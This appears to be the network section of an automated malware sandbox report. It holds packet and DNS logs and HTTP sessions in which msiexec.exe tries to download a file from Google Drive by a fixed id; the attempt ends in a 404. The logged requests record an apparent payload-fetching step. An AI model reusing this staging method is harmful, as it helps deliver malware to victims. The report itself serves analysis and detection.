Jan 11, 2025 01:31:20.948512077 CET | 50005 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:31:20.949034929 CET | 50005 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:31:20.949045897 CET | 443 | 50005 | 142.250.181.225 | 192.168.2.9
Jan 11, 2025 01:31:20.949193954 CET | 50005 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:31:20.949201107 CET | 443 | 50005 | 142.250.181.225 | 192.168.2.9
Jan 11, 2025 01:31:21.348855972 CET | 443 | 50005 | 142.250.181.225 | 192.168.2.9
Jan 11, 2025 01:31:21.348937035 CET | 443 | 50005 | 142.250.181.225 | 192.168.2.9
Jan 11, 2025 01:31:21.348970890 CET | 50005 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:31:21.349000931 CET | 443 | 50005 | 142.250.181.225 | 192.168.2.9
Jan 11, 2025 01:31:21.349020004 CET | 443 | 50005 | 142.250.181.225 | 192.168.2.9
Jan 11, 2025 01:31:21.349020004 CET | 50005 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:31:21.349071980 CET | 50005 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:31:21.349071980 CET | 50005 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:31:21.349700928 CET | 50005 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:31:21.349719048 CET | 443 | 50005 | 142.250.181.225 | 192.168.2.9
Jan 11, 2025 01:31:21.486597061 CET | 50006 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:31:21.486648083 CET | 443 | 50006 | 142.250.184.206 | 192.168.2.9
Jan 11, 2025 01:31:21.486861944 CET | 50006 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:31:21.487133980 CET | 50006 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:31:21.487149954 CET | 443 | 50006 | 142.250.184.206 | 192.168.2.9
Jan 11, 2025 01:31:22.134181023 CET | 443 | 50006 | 142.250.184.206 | 192.168.2.9
Jan 11, 2025 01:31:22.134607077 CET | 50006 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:31:22.136368990 CET | 50006 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:31:22.136390924 CET | 443 | 50006 | 142.250.184.206 | 192.168.2.9
Jan 11, 2025 01:31:22.136548042 CET | 50006 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:31:22.136555910 CET | 443 | 50006 | 142.250.184.206 | 192.168.2.9
Jan 11, 2025 01:31:22.521677971 CET | 443 | 50006 | 142.250.184.206 | 192.168.2.9
Jan 11, 2025 01:31:22.521862030 CET | 50006 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:31:22.521887064 CET | 443 | 50006 | 142.250.184.206 | 192.168.2.9
Jan 11, 2025 01:31:22.522254944 CET | 50006 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:31:22.522339106 CET | 443 | 50006 | 142.250.184.206 | 192.168.2.9
Jan 11, 2025 01:31:22.522402048 CET | 50006 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:31:22.522402048 CET | 50006 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:31:22.522464991 CET | 443 | 50006 | 142.250.184.206 | 192.168.2.9
Jan 11, 2025 01:31:22.522507906 CET | 50006 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:31:22.522507906 CET | 50006 | 443 | 192.168.2.9 | 142.250.184.206
Jan 11, 2025 01:31:22.545448065 CET | 50007 | 443 | 192.168.2.9 | 142.250.181.225
Jan 11, 2025 01:31:22.545499086 CET | 443 | 50007 | 142.250.181.225 | 192.168.2.9
Jan 11, 2025 01:31:22.545584917 CET | 50007 | 443 | 192.168.2.9 | 142.250.181.225
                                                          Jan 11, 2025 01:31:22.545944929 CET50007443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:22.545967102 CET44350007142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:23.174316883 CET44350007142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:23.175355911 CET50007443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:23.179371119 CET50007443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:23.179371119 CET50007443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:23.179408073 CET44350007142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:23.179426908 CET44350007142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:23.577840090 CET44350007142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:23.577902079 CET44350007142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:23.577939987 CET50007443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:23.577939987 CET50007443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:23.577971935 CET44350007142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:23.577985048 CET44350007142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:23.578046083 CET50007443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:23.579003096 CET50007443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:23.579026937 CET44350007142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:23.706518888 CET50008443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:23.706564903 CET44350008142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:23.706643105 CET50008443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:23.706892014 CET50008443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:23.706901073 CET44350008142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:24.363008976 CET44350008142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:24.363332987 CET50008443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:24.363718033 CET50008443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:24.363727093 CET44350008142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:24.363965988 CET50008443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:24.363970995 CET44350008142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:24.752782106 CET44350008142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:24.752918005 CET50008443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:24.753154039 CET50008443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:24.753207922 CET44350008142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:24.753395081 CET44350008142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:24.753431082 CET50008443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:24.753603935 CET50008443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:24.784315109 CET50009443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:24.784348011 CET44350009142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:24.784465075 CET50009443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:24.784687996 CET50009443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:24.784703016 CET44350009142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:25.438745975 CET44350009142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:25.438821077 CET50009443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:25.439363956 CET50009443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:25.439378023 CET44350009142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:25.439516068 CET50009443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:25.439521074 CET44350009142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:25.975296974 CET44350009142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:25.975347996 CET50009443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:25.975363970 CET44350009142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:25.975379944 CET44350009142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:25.975410938 CET50009443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:25.975434065 CET50009443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:25.975436926 CET44350009142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:25.975456953 CET44350009142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:25.975472927 CET50009443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:25.975503922 CET50009443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:25.976233006 CET50009443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:25.976247072 CET44350009142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:26.111731052 CET50010443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:26.111780882 CET44350010142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:26.111929893 CET50010443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:26.112155914 CET50010443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:26.112171888 CET44350010142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:26.838593960 CET44350010142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:26.838696957 CET50010443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:26.839390993 CET44350010142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:26.839562893 CET50010443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:26.841557026 CET50010443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:26.841562033 CET44350010142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:26.841799021 CET44350010142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:26.841851950 CET50010443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:26.842339993 CET50010443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:26.883325100 CET44350010142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:27.224982023 CET44350010142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:27.225074053 CET50010443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:27.225364923 CET50010443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:27.225406885 CET44350010142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:27.225579977 CET44350010142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:27.225698948 CET50010443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:27.225936890 CET50010443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:27.276376009 CET50011443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:27.276433945 CET44350011142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:27.276596069 CET50011443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:27.277219057 CET50011443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:27.277235031 CET44350011142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:28.033757925 CET44350011142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:28.033833027 CET50011443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:28.034410000 CET50011443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:28.034419060 CET44350011142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:28.034607887 CET50011443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:28.034612894 CET44350011142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:28.453363895 CET44350011142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:28.453444004 CET50011443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:28.453551054 CET44350011142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:28.453610897 CET50011443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:28.453635931 CET44350011142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:28.453746080 CET44350011142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:28.453847885 CET50011443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:28.454438925 CET50011443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:28.454457998 CET44350011142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:28.596389055 CET50012443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:28.596440077 CET44350012142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:28.596574068 CET50012443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:28.596786976 CET50012443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:28.596808910 CET44350012142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:29.246201992 CET44350012142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:29.246376038 CET50012443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:29.246978998 CET44350012142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:29.247055054 CET50012443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:29.249125004 CET50012443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:29.249149084 CET44350012142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:29.249394894 CET44350012142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:29.249461889 CET50012443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:29.250080109 CET50012443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:29.291336060 CET44350012142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:29.635607958 CET44350012142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:29.635715961 CET50012443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:29.635735035 CET44350012142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:29.635826111 CET50012443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:29.635826111 CET50012443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:29.635855913 CET44350012142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:29.635993958 CET44350012142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:29.636385918 CET50012443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:29.636385918 CET50012443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:29.670232058 CET50013443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:29.670265913 CET44350013142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:29.670336962 CET50013443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:29.670579910 CET50013443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:29.670591116 CET44350013142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:30.331362963 CET44350013142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:30.331455946 CET50013443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:30.332098961 CET50013443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:30.332113981 CET44350013142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:30.332287073 CET50013443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:30.332298994 CET44350013142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:30.745107889 CET44350013142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:30.745172977 CET44350013142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:30.745242119 CET44350013142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:30.745321035 CET50013443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:30.745359898 CET50013443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:30.746155024 CET50013443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:30.746171951 CET44350013142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:30.892795086 CET50014443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:30.892836094 CET44350014142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:30.892997026 CET50014443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:30.893423080 CET50014443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:30.893445969 CET44350014142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:31.533962011 CET44350014142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:31.534044981 CET50014443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:31.534715891 CET44350014142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:31.534766912 CET50014443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:31.536660910 CET50014443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:31.536679983 CET44350014142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:31.536933899 CET44350014142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:31.537039995 CET50014443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:31.537451029 CET50014443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:31.579339027 CET44350014142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:31.926806927 CET44350014142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:31.926892996 CET50014443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:31.926919937 CET44350014142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:31.926960945 CET50014443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:31.927041054 CET50014443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:31.927071095 CET44350014142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:31.927119970 CET50014443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:31.946696997 CET50015443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:31.946733952 CET44350015142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:31.946825027 CET50015443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:31.947069883 CET50015443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:31.947082043 CET44350015142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:32.602633953 CET44350015142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:32.602762938 CET50015443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:32.603281975 CET50015443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:32.603288889 CET44350015142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:32.603441000 CET50015443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:32.603446007 CET44350015142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:33.025363922 CET44350015142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:33.025433064 CET44350015142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:33.025501013 CET44350015142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:33.025711060 CET50015443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:33.025711060 CET50015443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:33.026304007 CET50015443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:33.026340961 CET44350015142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:33.175048113 CET50016443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:33.175103903 CET44350016142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:33.175237894 CET50016443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:33.180095911 CET50016443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:33.180114985 CET44350016142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:33.829344988 CET44350016142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:33.829413891 CET50016443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:33.830127001 CET44350016142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:33.830176115 CET50016443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:33.843612909 CET50016443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:33.843635082 CET44350016142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:33.843930006 CET44350016142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:33.843986988 CET50016443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:33.845473051 CET50016443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:33.887336016 CET44350016142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:34.219352007 CET44350016142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:34.220200062 CET50016443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:34.220211983 CET44350016142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:34.220439911 CET50016443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:34.220536947 CET44350016142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:34.220558882 CET50016443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:34.220588923 CET44350016142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:34.220592022 CET50016443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:34.220652103 CET50016443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:34.372957945 CET50017443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:34.373059034 CET44350017142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:34.376456022 CET50017443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:34.376697063 CET50017443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:34.376730919 CET44350017142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:35.176722050 CET44350017142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:35.176887035 CET50017443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:35.177253008 CET50017443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:35.177282095 CET44350017142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:35.177418947 CET50017443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:35.177432060 CET44350017142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:35.596683025 CET44350017142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:35.596750021 CET44350017142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:35.596806049 CET50017443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:35.596813917 CET44350017142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:35.596843958 CET50017443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:35.596888065 CET50017443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:35.597448111 CET50017443192.168.2.9142.250.181.225
                                                          Jan 11, 2025 01:31:35.597462893 CET44350017142.250.181.225192.168.2.9
                                                          Jan 11, 2025 01:31:35.722758055 CET50018443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:35.722801924 CET44350018142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:35.722872972 CET50018443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:35.723304987 CET50018443192.168.2.9142.250.184.206
                                                          Jan 11, 2025 01:31:35.723320007 CET44350018142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:36.360493898 CET44350018142.250.184.206192.168.2.9
                                                          Jan 11, 2025 01:31:36.360568047 CET50018443192.168.2.9142.250.184.206
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 01:30:43.512227058 CET | 57728 | 53 | 192.168.2.9 | 1.1.1.1
Jan 11, 2025 01:30:43.518968105 CET | 53 | 57728 | 1.1.1.1 | 192.168.2.9
Jan 11, 2025 01:30:44.616436958 CET | 53017 | 53 | 192.168.2.9 | 1.1.1.1
Jan 11, 2025 01:30:44.623703957 CET | 53 | 53017 | 1.1.1.1 | 192.168.2.9
                                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                          Jan 11, 2025 01:30:43.512227058 CET | 192.168.2.9 | 1.1.1.1 | 0xac25 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
                                                          Jan 11, 2025 01:30:44.616436958 CET | 192.168.2.9 | 1.1.1.1 | 0x13e | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false
                                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                          Jan 11, 2025 01:29:28.205841064 CET | 1.1.1.1 | 192.168.2.9 | 0xdf17 | No error (0) | shed.dual-low.s-part-0017.t-0009.t-msedge.net | s-part-0017.t-0009.t-msedge.net | - | CNAME (Canonical name) | IN (0x0001) | false
                                                          Jan 11, 2025 01:29:28.205841064 CET | 1.1.1.1 | 192.168.2.9 | 0xdf17 | No error (0) | s-part-0017.t-0009.t-msedge.net | - | 13.107.246.45 | A (IP address) | IN (0x0001) | false
                                                          Jan 11, 2025 01:30:43.518968105 CET | 1.1.1.1 | 192.168.2.9 | 0xac25 | No error (0) | drive.google.com | - | 142.250.184.206 | A (IP address) | IN (0x0001) | false
                                                          Jan 11, 2025 01:30:44.623703957 CET | 1.1.1.1 | 192.168.2.9 | 0x13e | No error (0) | drive.usercontent.google.com | - | 142.250.181.225 | A (IP address) | IN (0x0001) | false
                                                          • drive.google.com
                                                          • drive.usercontent.google.com
                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          0 | 192.168.2.9 | 49974 | 142.250.184.206 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:30:44 UTC | 216 | OUT | GET /uc?export=download&id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Host: drive.google.com
                                                          Cache-Control: no-cache
                                                          2025-01-11 00:30:44 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                          Content-Type: application/binary
                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                          Pragma: no-cache
                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                          Date: Sat, 11 Jan 2025 00:30:44 GMT
                                                          Location: https://drive.usercontent.google.com/download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download
                                                          Strict-Transport-Security: max-age=31536000
                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                          Cross-Origin-Opener-Policy: same-origin
                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                          Content-Security-Policy: script-src 'nonce-BN0J13Xalg0gfSYRyJ89JQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                          Server: ESF
                                                          Content-Length: 0
                                                          X-XSS-Protection: 0
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Content-Type-Options: nosniff
                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                          Connection: close


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          1 | 192.168.2.9 | 49975 | 142.250.181.225 | 443 | 3848 | C:\Windows\SysWOW64\msiexec.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          2025-01-11 00:30:45 UTC | 258 | OUT | GET /download?id=1Qi9esE-tM0HXdqgB-CIktL_zQq9z-avP&export=download HTTP/1.1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                          Cache-Control: no-cache
                                                          Host: drive.usercontent.google.com
                                                          Connection: Keep-Alive
                                                          2025-01-11 00:30:45 UTC | 2218 | IN | HTTP/1.1 404 Not Found
